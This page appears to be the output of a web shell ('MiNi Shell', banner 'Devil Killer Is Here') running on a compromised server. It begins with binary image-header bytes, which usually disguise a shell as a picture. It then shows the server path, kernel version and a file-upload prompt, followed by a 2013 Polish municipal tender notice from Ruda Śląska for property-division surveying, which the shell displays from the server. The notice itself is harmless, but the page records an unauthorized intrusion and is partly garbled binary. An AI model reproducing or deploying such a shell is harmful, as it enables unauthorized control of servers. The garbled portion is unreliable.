JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130122/29840-N-2013.html

<p class="kh_header"><b>Ruda Śląska: Wykonanie ostatecznych podziałów nieruchomościu dla potrzeb bieżącej działalności Wydziału Gospodarki Nieruchomościami i Wydziału Spraw Lokalowych Urzędu Miasta Ruda Śląska</b><br>
<b>Numer ogłoszenia: 29840 - 2013; data zamieszczenia: 22.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Ruda Śląska , Plac Jana Pawła II 6, 41-709 Ruda Śląska, woj. śląskie, tel. 032 2486281 do 9; 2449094, faks 032 248 7348.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie ostatecznych podziałów nieruchomościu dla potrzeb bieżącej działalności Wydziału Gospodarki Nieruchomościami i Wydziału Spraw Lokalowych Urzędu Miasta Ruda Śląska.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiotem zamówienia jest wykonanie ostatecznych podziałów nieruchomości dla potrzeb bieżącej działalności Wydziału Gospodarki Nieruchomościami i Wydziału Spraw Lokalowych Urzędu Miasta Ruda Śląska.
Zamówienie obejmuje 4 zadania, tj. wykonanie ostatecznych podziałów następujących nieruchomości: 
1. Nieruchomość położona w Rudzie Śląskiej - Goduli przy ulicy Ignacego Nowaka (Postanowienie               nr AM.6831.2.58.2012 z dnia 06.11.2012 r.),
2. Nieruchomość położona w Rudzie Śląskiej - Orzegowie przy ulicy kard. Augusta Hlonda (Postanowienie nr AM.6831.2.48.2012 z dnia 10.08.2012 r.),
3. Nieruchomość położona w Rudzie Śląskiej - Kochłowicach przy ulicy Oświęcimskiej (Postanowienie nr AM.6831.2.49.2012 z dnia 14.08.2012 r.),
4. Nieruchomości położonych w Rudzie Śląskiej - dzielnicy Ruda przy ulicy Sosinki (Postanowienie               nr AM.6831.2.19.2011 z dnia 29.09.2011 r.).

II. Zakres prac do wykonania

Przedmiotowe prace należy wykonać zgodnie z obowiązującymi przepisami prawa oraz   z aktualnymi wytycznymi Biura Geodety Miasta Ruda Śląska.
Zakres prac nie obejmuje opracowania wstępnego projektu podziału. Zamawiający informuje, iż               może zaistnieć konieczność wykonania rozgraniczenia nieruchomości, lub zmiany powierzchni starej działki co Wykonawca powinien przewidzieć przy szacowaniu kosztów wykonywania usługi. Zamawiający nie będzie ponosił dodatkowych kosztów za ich sporządzenie.				  Zamawiający informuje, iż może wystąpić potrzeba zastabilizowania istniejących punktów granicznych w przypadku uszkodzenia, zniszczenia, przesunięcia punktów granicznych.
Zamawiający jednocześnie informuje, iż na Wykonawcy ciąży obowiązek aktualizacji istniejących  kartotek budynkowych ujawnionych w ewidencji gruntów i budynków (wykaz zmian budynkowych). W przypadku braku tych kartotek należy je stworzyć (karta budynkowa).Informuje się, iż dla ww. podziałów należy ustalić wszystkie granice działki pierwotnej  i określić nowe powierzchnie dla wszystkich nowopowstałych działek.  
Szczegółowy opis przedmiotu zamówienia zawiera SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.35.32.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 120.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium w niniejszym postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 2 podziały nieruchomości</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dysponowanie (dysponuje lub będzie dysponował) min. 1 osobą z uprawnieniami zawodowymi w zakresie rozgraniczenia i podziałów nieruchomości (gruntów) oraz sporządzenia dokumentacji do celów prawnych  zgodnie z przepisami ustawy z dnia 17.05.1989 r. Prawo geodezyjne i kartogaficzne (tekst jednolity Dz.U.z 2010 r. Nr 193, poz.1287 z późn.zm.) lub której uprawnienia zostały uznane zgodnie z przepisami ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii europejskiej (Dz.U. Nr 63, poz. 394).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.W zakresie warunków udziału w postępowaniu opisanych w pkt 2.2 do 2.4. (opis sposobu dokonania oceny spełniania warunków) rozdziału XII SIWZ, Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Zobowiązanie takie należy złożyć w oryginale, nie dopuszcza się możliwości złożenia tego dokumentu w formie kopii potwierdzonej za zgodność z oryginałem. 2. Oświadczenie, że wykonawca zapoznał się z warunkami zamówienia i złożonym wzorem umowy oraz, że przyjmuje ich treść bez żadnych zastrzeżeń. 3. Pełnomocnictwo ustanowione do reprezentowania wykonawcy/ów ubiegających się o udzielenie zamówienia publicznego. Pełnomocnictwo należy składać oryginale bądź kopii, potwierdzonej za zgodność z oryginałem notarialnie</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, zgodnie z warunkami podanymi we wzorze umowy, stanowiącej załącznik nr 7 do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rudaslaska.bip.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Ruda Śląska Wydział Zamówień Publicznych (pokój 309)
plac Jana Pawła II nr 6
41-709 Ruda Śląska.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.02.2013 godzina 09:30, miejsce: Urząd Miasta Ruda Śląska Wydział Zamówień Publicznych (pokój 309)
plac Jana Pawła II nr 6
41-709 Ruda Śląska.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Z uwagi na opis dokonania oceny spełniania warunku Zamawiający nie wymaga podania doswiadczenia i wykształcenia w wykazie osób, o którym mowa w sekcji III.4.2  2.Termin realizacji zamówienia podany w sekcji II.2 oraz w załączniku I jest następujący  : Zamówienie należy zrealizować w terminie: 
A. I ETAP:
1. Podział nieruchomości położonej w Rudzie Śląskiej - Goduli przy ulicy Ignacego Nowaka
(Postanowienie nr AM.6831.2.58.2012 z dnia 06.11.2012 r.)-  do 100 dni od daty zawarcia umowy,
2.Podział nieruchomości położonej w Rudzie Śląskiej - Orzegowie przy ulicy kard. Augusta Hlonda 
(Postanowienie nr AM.6831.2.48.2012 z dnia 10.08.2012 r.)- do 100 dni od daty zawarcia umowy,
3. Podział nieruchomości położonej w Rudzie Śląskiej - Kochłowicach przy ulicy Oświęcimskiej
(Postanowienie nr AM.6831.2.49.2012 z dnia 14.08.2012 r.)- do 100 dni od daty zawarcia umowy,
4. Podział nieruchomości położonych w Rudzie Śląskiej - dzielnicy Ruda przy ulicy Sosinki
(Postanowienie nr AM.6831.2.19.2011 z dnia 29.09.2011 r.)- do 120 dni od daty zawarcia umowy.
Termin wykonania podziału wydłuża się:
W przypadku konieczności wykonania rozgraniczenia nieruchomości - 70 dni od daty postanowienia o rozgraniczeniu.
Jeżeli wystąpi potrzeba wydania decyzji zatwierdzającej zmianę powierzchni działek termin wykonania roboty wydłuża się o 42 dni.
Wydłużenie terminów wykonania podziałów nastąpi w momencie pisemnej informacji potwierdzonej przez Biuro Geodety Miasta. Wykonawca winien niezwłocznie, pisemne powiadomić Zamawiającego o konieczności sporządzenia rozgraniczenia/ zmianie powierzchni działek. II ETAP:
Stabilizacja punktów granicznych wyznaczających nowe granice działki:
- 42 dni, (do 7 dni od otrzymania decyzji podziałowej zobowiązuje się Wykonawcę do zgłoszenia wznowienia nowych punktów granicznych i sporządzenia jej w terminie jw.).3. Potwierdzenie spełniania warunków udziału w niniejszym postępowaniu, Zamawiający oceniał będzie na podstawie wymaganych oświadczeń i dokumentów. Ocena spełniania warunków dokonywana będzie w systemie 0 - 1 (zero - jedynkowym tj. spełnia - nie spełnia), nie spełnienie chociażby jednego z postawionych warunków udziału spowoduje wykluczenie Wykonawcy z postępowania..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Podział nieruchomości położonej w Rudzie Śląskiej - Goduli przy ulicy Ignacego Nowaka
(Postanowienie nr AM.6831.2.58.2012 z dnia 06.11.2012 r.),.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotowe prace należy wykonać zgodnie z obowiązującymi przepisami prawa oraz                            z aktualnymi wytycznymi Biura Geodety Miasta Ruda Śląska.

Zakres prac nie obejmuje opracowania wstępnego projektu podziału. Zamawiający informuje, iż               może zaistnieć konieczność wykonania rozgraniczenia nieruchomości, lub zmiany powierzchni starej działki co Wykonawca powinien przewidzieć przy szacowaniu kosztów wykonywania usługi. Zamawiający nie będzie ponosił dodatkowych kosztów za ich sporządzenie.				  Zamawiający informuje, iż może wystąpić potrzeba zastabilizowania istniejących punktów granicznych w przypadku uszkodzenia, zniszczenia, przesunięcia punktów granicznych.
Zamawiający jednocześnie informuje, iż na Wykonawcy ciąży obowiązek aktualizacji istniejących  kartotek budynkowych ujawnionych w ewidencji gruntów i budynków (wykaz zmian budynkowych). W przypadku braku tych kartotek należy je stworzyć (karta budynkowa).
Informuje się, iż dla ww. podziałów należy ustalić wszystkie granice działki pierwotnej  i określić nowe powierzchnie dla wszystkich nowopowstałych działek.  
Szczegółowy opis przedmiotu zamówienia zawiera SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.32.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 100.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Podział nieruchomość położonej w Rudzie Śląskiej - Orzegowie przy ulicy kard. Augusta Hlonda (Postanowienie nr AM.6831.2.48.2012 z dnia 10.08.2012 r.),.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotowe prace należy wykonać zgodnie z obowiązującymi przepisami prawa oraz                            z aktualnymi wytycznymi Biura Geodety Miasta Ruda Śląska.

Zakres prac nie obejmuje opracowania wstępnego projektu podziału. Zamawiający informuje, iż               może zaistnieć konieczność wykonania rozgraniczenia nieruchomości, lub zmiany powierzchni starej działki co Wykonawca powinien przewidzieć przy szacowaniu kosztów wykonywania usługi. Zamawiający nie będzie ponosił dodatkowych kosztów za ich sporządzenie.				  Zamawiający informuje, iż może wystąpić potrzeba zastabilizowania istniejących punktów granicznych w przypadku uszkodzenia, zniszczenia, przesunięcia punktów granicznych.
Zamawiający jednocześnie informuje, iż na Wykonawcy ciąży obowiązek aktualizacji istniejących  kartotek budynkowych ujawnionych w ewidencji gruntów i budynków (wykaz zmian budynkowych). W przypadku braku tych kartotek należy je stworzyć (karta budynkowa).

Informuje się, iż dla ww. podziałów należy ustalić wszystkie granice działki pierwotnej  i określić nowe powierzchnie dla wszystkich nowopowstałych działek.  
Szczegółowy opis przedmiotu zamówienia zawiera SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.32.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 100.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Podzial nieruchomość położonej w Rudzie Śląskiej - Kochłowicach przy ulicy Oświęcimskiej (Postanowienie nr AM.6831.2.49.2012 z dnia 14.08.2012 r.),.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotowe prace należy wykonać zgodnie z obowiązującymi przepisami prawa oraz                            z aktualnymi wytycznymi Biura Geodety Miasta Ruda Śląska.

Zakres prac nie obejmuje opracowania wstępnego projektu podziału. Zamawiający informuje, iż               może zaistnieć konieczność wykonania rozgraniczenia nieruchomości, lub zmiany powierzchni starej działki co Wykonawca powinien przewidzieć przy szacowaniu kosztów wykonywania usługi. Zamawiający nie będzie ponosił dodatkowych kosztów za ich sporządzenie.				  Zamawiający informuje, iż może wystąpić potrzeba zastabilizowania istniejących punktów granicznych w przypadku uszkodzenia, zniszczenia, przesunięcia punktów granicznych.
Zamawiający jednocześnie informuje, iż na Wykonawcy ciąży obowiązek aktualizacji istniejących  kartotek budynkowych ujawnionych w ewidencji gruntów i budynków (wykaz zmian budynkowych). W przypadku braku tych kartotek należy je stworzyć (karta budynkowa).

Informuje się, iż dla ww. podziałów należy ustalić wszystkie granice działki pierwotnej  i określić nowe powierzchnie dla wszystkich nowopowstałych działek.  
Szczegółowy opis przedmiotu zamówienia zawiera SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.32.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 100.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Podział nieruchomości położonych w Rudzie Śląskiej - dzielnicy Ruda przy ulicy Sosinki (Postanowienie               nr AM.6831.2.19.2011 z dnia 29.09.2011 r.)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotowe prace należy wykonać zgodnie z obowiązującymi przepisami prawa oraz                            z aktualnymi wytycznymi Biura Geodety Miasta Ruda Śląska.

Zakres prac nie obejmuje opracowania wstępnego projektu podziału. Zamawiający informuje, iż               może zaistnieć konieczność wykonania rozgraniczenia nieruchomości, lub zmiany powierzchni starej działki co Wykonawca powinien przewidzieć przy szacowaniu kosztów wykonywania usługi. Zamawiający nie będzie ponosił dodatkowych kosztów za ich sporządzenie.				  Zamawiający informuje, iż może wystąpić potrzeba zastabilizowania istniejących punktów granicznych w przypadku uszkodzenia, zniszczenia, przesunięcia punktów granicznych.
Zamawiający jednocześnie informuje, iż na Wykonawcy ciąży obowiązek aktualizacji istniejących  kartotek budynkowych ujawnionych w ewidencji gruntów i budynków (wykaz zmian budynkowych). W przypadku braku tych kartotek należy je stworzyć (karta budynkowa).

Informuje się, iż dla ww. podziałów należy ustalić wszystkie granice działki pierwotnej  i określić nowe powierzchnie dla wszystkich nowopowstałych działek.  
Szczegółowy opis przedmiotu zamówienia zawiera SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.32.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com